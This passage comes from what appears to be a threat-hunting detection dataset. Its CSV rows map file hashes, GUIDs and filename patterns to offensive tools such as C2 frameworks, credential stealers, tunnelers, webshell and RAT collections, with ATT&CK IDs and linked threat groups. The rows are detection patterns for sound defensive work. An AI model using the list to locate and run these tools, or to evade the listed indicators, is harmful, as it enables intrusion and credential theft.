- T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","37933" "*ce0ae1416a4841144e8a377eed2a11fef988b08042606bac8121b4a4abd5391e*",".{0,1000}ce0ae1416a4841144e8a377eed2a11fef988b08042606bac8121b4a4abd5391e.{0,1000}","offensive_tool_keyword","BrowserGhost","This is a tool for grabbing browser 
passwords","T1555.003 - T1555.013 - T1003.008","TA0006","N/A","N/A","Credential Access","https://github.com/QAX-A-Team/BrowserGhost","1","0","#filehash","N/A","10","10","1414","206","2022-05-21T14:09:45Z","2020-06-12T12:19:06Z","37934" "*ce137e86b9a64ee2424a5da774398fb01a1488c50038fcc883c8bbcb2fa82ea9*",".{0,1000}ce137e86b9a64ee2424a5da774398fb01a1488c50038fcc883c8bbcb2fa82ea9.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","37935" "*ce14d0dea73e7da1599d098035aca77ad80388cf3f9c8f8a39aefc90cfae59a7*",".{0,1000}ce14d0dea73e7da1599d098035aca77ad80388cf3f9c8f8a39aefc90cfae59a7.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","37936" "*ce189906ea564b5bd6d924791d90b65a3c56d4313d45bdab310145e55a042b6f*",".{0,1000}ce189906ea564b5bd6d924791d90b65a3c56d4313d45bdab310145e55a042b6f.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","37938" 
"*ce2047b5a3ce8608ac3203f14284542cd895fbf67a0a400a9353ba7b3a9f188b*",".{0,1000}ce2047b5a3ce8608ac3203f14284542cd895fbf67a0a400a9353ba7b3a9f188b.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","37939" "*CE2307EB-A69E-0EB9-386C-D322223A10A9*",".{0,1000}CE2307EB\-A69E\-0EB9\-386C\-D322223A10A9.{0,1000}","offensive_tool_keyword","SilentCryptoMiner","A Silent (Hidden) Free Crypto Miner Builder","T1496 - T1055 - T1546 - T1082 - T1574","TA0042 - TA0005 - TA0003 - TA0009","N/A","N/A","Cryptomining","https://github.com/UnamSanctam/SilentCryptoMiner","1","0","#GUIDproject","N/A","9","","N/A","","","","37940" "*CE23F388-34F5-4543-81D1-91CD244C9CB1*",".{0,1000}CE23F388\-34F5\-4543\-81D1\-91CD244C9CB1.{0,1000}","offensive_tool_keyword","impacketremoteshell","install a legit application and interface with it over smb w/o the signature of cmd.exe / powershell.exe being called or the redirection typically used by those techniques","T1077 - T1059.007 - T1569.001","TA0008 - TA0005 - TA0040","N/A","N/A","Lateral Movement","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","37941" "*ce26833cea9cc46a3fc2b6418de85ce94dd4d190cca15757ba40fec475487e73*",".{0,1000}ce26833cea9cc46a3fc2b6418de85ce94dd4d190cca15757ba40fec475487e73.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts 
suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","37942" "*ce26cac7b0d52a3922cc05a777bb83025430a6a5d31104840a0099d7bd0cb2f4*",".{0,1000}ce26cac7b0d52a3922cc05a777bb83025430a6a5d31104840a0099d7bd0cb2f4.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","37943" "*ce2e6ef4cc10bd9de836c9de164dd80e043d713ef1ee3425b5bc29f4c7c6e39e*",".{0,1000}ce2e6ef4cc10bd9de836c9de164dd80e043d713ef1ee3425b5bc29f4c7c6e39e.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","37945" "*ce310ab611895db1767877bd1f635ee3c4350d6e17ea28f8d100313f62b87382*",".{0,1000}ce310ab611895db1767877bd1f635ee3c4350d6e17ea28f8d100313f62b87382.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - 
T1568","TA0001 - TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/BeichenDream/Godzilla","1","0","#filehash","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","37947" "*ce3f57bd1bf1d9e32bfccd801768765cf7b4b20c4cac0a61ea4cfde74832a0d2*",".{0,1000}ce3f57bd1bf1d9e32bfccd801768765cf7b4b20c4cac0a61ea4cfde74832a0d2.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","37950" "*ce4255704740f395be5713b049b97814ce537c440b1249850bcb62794dcc7f56*",".{0,1000}ce4255704740f395be5713b049b97814ce537c440b1249850bcb62794dcc7f56.{0,1000}","offensive_tool_keyword","NTLMInjector","restore the user password after a password reset (get the previous hash with DCSync)","T1555 - T1556.003 - T1078 - T1110.003 - T1201 - T1003","TA0001 - TA0003 - TA0004 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/vletoux/NTLMInjector","1","0","#filehash","N/A","10","2","167","29","2017-06-08T19:01:21Z","2017-06-04T07:25:36Z","37951" "*ce43f1e8e27c93b61b84c4024f7f9321c2755d6a5fd679f4d8324aadfd7ad76f*",".{0,1000}ce43f1e8e27c93b61b84c4024f7f9321c2755d6a5fd679f4d8324aadfd7ad76f.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","37952" 
"*ce4821d0b380319df17ce6166db15577abd9e77d090d15c83fa67545174f4631*",".{0,1000}ce4821d0b380319df17ce6166db15577abd9e77d090d15c83fa67545174f4631.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","37953" "*ce4abd249e1f6497549ca7a2e814c8232f42597ce8b02f77fd3dde31a723a501*",".{0,1000}ce4abd249e1f6497549ca7a2e814c8232f42597ce8b02f77fd3dde31a723a501.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","37954" "*ce514ccbb11797a5e0457b8da2cf4914b753928dcc15d59d4db2d2b5ffcd061b*",".{0,1000}ce514ccbb11797a5e0457b8da2cf4914b753928dcc15d59d4db2d2b5ffcd061b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","37957" "*CE5C7EF9-E890-48E5-8551-3E8F96DCB38F*",".{0,1000}CE5C7EF9\-E890\-48E5\-8551\-3E8F96DCB38F.{0,1000}","offensive_tool_keyword","nsocks",".NET HttpClient proxy handler implementation for SOCKS proxies","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Scattered Spider* - Black Basta","C2","https://github.com/bbepis/Nsocks","1","0","#GUIDproject","N/A","8","10","3","0","2020-06-08T17:25:07Z","2020-03-28T09:00:22Z","37960" "*ce613fc8-3f97-4989-bc90-2027463ea37d*",".{0,1000}ce613fc8\-3f97\-4989\-bc90\-2027463ea37d.{0,1000}","offensive_tool_keyword","HookSentry","tool for inspecting system DLLs loaded into processes - looking for functions hooked from AV/EDR.","T1055.001 - T1055 - T1057","TA0007 - TA0005","N/A","N/A","Defense Evasion","https://github.com/UmaRex01/HookSentry","1","0","#GUIDproject","N/A","6","1","27","2","2025-04-02T12:30:58Z","2024-11-20T18:09:39Z","37962" "*CE61ADEE-C032-43EC-ACD8-E4A742F894A3*",".{0,1000}CE61ADEE\-C032\-43EC\-ACD8\-E4A742F894A3.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","37963" 
"*ce70b1200ce76360dec6129189daa260779901d01f150868c9f19ec6cea77b36*",".{0,1000}ce70b1200ce76360dec6129189daa260779901d01f150868c9f19ec6cea77b36.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","#filehash","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","37966" "*ce75590d1d79bc808d98b70ec03355d1117ca54c3b49b6ba474aa704ea9a6c2e*",".{0,1000}ce75590d1d79bc808d98b70ec03355d1117ca54c3b49b6ba474aa704ea9a6c2e.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","37967" "*ce75ede7827b5a067bb11a5153e3046286251acaf1e92fd3edf4a46e506b5968*",".{0,1000}ce75ede7827b5a067bb11a5153e3046286251acaf1e92fd3edf4a46e506b5968.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - 
T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","37968" "*ce7979010bdb291a0a1884e00e238d9fc3bc27ec7a1d1093be273c22e865f676*",".{0,1000}ce7979010bdb291a0a1884e00e238d9fc3bc27ec7a1d1093be273c22e865f676.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","37969" "*ce820866d58afd4f191053c7871032a69a3b7cf923ec47996738a151ddc61254*",".{0,1000}ce820866d58afd4f191053c7871032a69a3b7cf923ec47996738a151ddc61254.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","37971" "*CE895D82-85AA-41D9-935A-9625312D87D0*",".{0,1000}CE895D82\-85AA\-41D9\-935A\-9625312D87D0.{0,1000}","offensive_tool_keyword","SharpGmailC2","Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol","T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/reveng007/SharpGmailC2","1","0","#GUIDproject","N/A","10","10","260","47","2022-12-27T01:45:46Z","2022-11-10T06:48:15Z","37972" 
"*ce8a96ade87a39ebb8e4dc1602ab2b80cef1fffc317b557c258839223c65667c*",".{0,1000}ce8a96ade87a39ebb8e4dc1602ab2b80cef1fffc317b557c258839223c65667c.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","#filehash","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","37973" "*ce8cdc354e0ff5b4aa329e1ef3e55aaabfcb1a592c697b327e93b59f5ae9a217*",".{0,1000}ce8cdc354e0ff5b4aa329e1ef3e55aaabfcb1a592c697b327e93b59f5ae9a217.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","37974" "*ce9ae24722afd760de25a8961c4446b64235936b8ac8d1c2c25625d4feaee6e6*",".{0,1000}ce9ae24722afd760de25a8961c4446b64235936b8ac8d1c2c25625d4feaee6e6.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","37975" "*cea27c53085b6cf1d9505957144aa23b794550da5746e6a38a212a03b505e157*",".{0,1000}cea27c53085b6cf1d9505957144aa23b794550da5746e6a38a212a03b505e157.{0,1000}","offensive_tool_keyword","rattler","Automated DLL Enumerator","T1174 - T1574.007","TA0005","N/A","N/A","Discovery","https://github.com/sensepost/rattler","1","0","#filehash","N/A","9","6","531","135","2017-12-21T18:01:09Z","2016-11-28T12:35:44Z","37979" "*ceb602555ade094f60b02d5b68f2d76efa615cd1bfb05de20a6452e496353fc2*",".{0,1000}ceb602555ade094f60b02d5b68f2d76efa615cd1bfb05de20a6452e496353fc2.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","37980" "*cec47972c55b72e21161ef0c26125d86c544b5aa1d95915347220935412a591a*",".{0,1000}cec47972c55b72e21161ef0c26125d86c544b5aa1d95915347220935412a591a.{0,1000}","offensive_tool_keyword","PrivFu","Tool to execute token assigned process","T1055","TA0004","N/A","N/A","Privilege 
Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#filehash","TokenAssignor","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","37982" "*cecbe047e33d2dc3bc06cc7a62546a4e1a793d8da1dde4ba3aa021f944930d6d*",".{0,1000}cecbe047e33d2dc3bc06cc7a62546a4e1a793d8da1dde4ba3aa021f944930d6d.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","#filehash","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","37985" "*cecbe047e33d2dc3bc06cc7a62546a4e1a793d8da1dde4ba3aa021f944930d6d*",".{0,1000}cecbe047e33d2dc3bc06cc7a62546a4e1a793d8da1dde4ba3aa021f944930d6d.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","#filehash","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","37986" "*cee0283b58fa5fb0742f230a70f8a69cb283914e886d7a332b22eaf25b48f4ce*",".{0,1000}cee0283b58fa5fb0742f230a70f8a69cb283914e886d7a332b22eaf25b48f4ce.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","37988" "*cee1f314c34ecccd4fcb94d0715126130d02aeb153ec8504fbbae67c244cdb45*",".{0,1000}cee1f314c34ecccd4fcb94d0715126130d02aeb153ec8504fbbae67c244cdb45.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - 
T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","37989" "*cef1fb3c6273b3a908f79a5a5d74dbfe4ceabd2d9f850b2bd3e08e1908c440f1*",".{0,1000}cef1fb3c6273b3a908f79a5a5d74dbfe4ceabd2d9f850b2bd3e08e1908c440f1.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","37990" "*cef7cc0c146c7fc4a4beb9accd058cfe2d1bc80039993d1798e2f63d7216168a*",".{0,1000}cef7cc0c146c7fc4a4beb9accd058cfe2d1bc80039993d1798e2f63d7216168a.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","37991" "*cefcadb734f22d7ddd0ce551628c246f4484400758ccb64afeb37bb93c78b5e0*",".{0,1000}cefcadb734f22d7ddd0ce551628c246f4484400758ccb64afeb37bb93c78b5e0.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","37992" "*cefe3493adac8a6a93651d2299547c1e0891897522f2f1c4e0835ce577e60632*",".{0,1000}cefe3493adac8a6a93651d2299547c1e0891897522f2f1c4e0835ce577e60632.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","37993" "*ceffb6a2cd944a1309ee3b88992ea04e456f17bc2234b861bf1ed43e51a3e973*",".{0,1000}ceffb6a2cd944a1309ee3b88992ea04e456f17bc2234b861bf1ed43e51a3e973.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","37994" "*celerystalk*",".{0,1000}celerystalk.{0,1000}","offensive_tool_keyword","celerystalk","celerystalk helps you automate your network scanning/enumeration process with asynchronous jobs (aka tasks) while retaining full control of which tools you want to run.","T1046 - T1057 - T1082 - T1087 - T1069","TA0001 - 
TA0007","N/A","N/A","Reconnaissance","https://github.com/sethsec/celerystalk","1","0","N/A","N/A","N/A","5","401","70","2021-03-24T01:23:11Z","2018-08-13T04:21:37Z","37995" "*Celesty Binder/Celesty.exe*",".{0,1000}Celesty\sBinder\/Celesty\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","37996" "*cerberus-rat.com*",".{0,1000}cerberus\-rat\.com.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","37997" "*cerbrutus.py*",".{0,1000}cerbrutus\.py.{0,1000}","offensive_tool_keyword","cerbrutus","Network brute force tool. written in Python. Faster than other existing solutions (including the main leader in the network brute force market).","T1110 - T1040 - T1496","TA0006 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/Cerbrutus-BruteForcer/cerbrutus","1","1","N/A","N/A","N/A","4","385","57","2021-08-22T19:05:45Z","2021-07-07T19:11:40Z","37998" "*Cerbrutus-BruteForcer*",".{0,1000}Cerbrutus\-BruteForcer.{0,1000}","offensive_tool_keyword","cerbrutus","Network brute force tool. written in Python. 
Faster than other existing solutions (including the main leader in the network brute force market).","T1110 - T1040 - T1496","TA0006 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/Cerbrutus-BruteForcer/cerbrutus","1","1","N/A","N/A","N/A","4","385","57","2021-08-22T19:05:45Z","2021-07-07T19:11:40Z","37999" "*cert*responder.crt*",".{0,1000}cert.{0,1000}responder\.crt.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","0","N/A","N/A","N/A","10","4656","1722","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z","38000" "*cert*responder.key*",".{0,1000}cert.{0,1000}responder\.key.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","0","N/A","N/A","N/A","10","4656","1722","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z","38001" 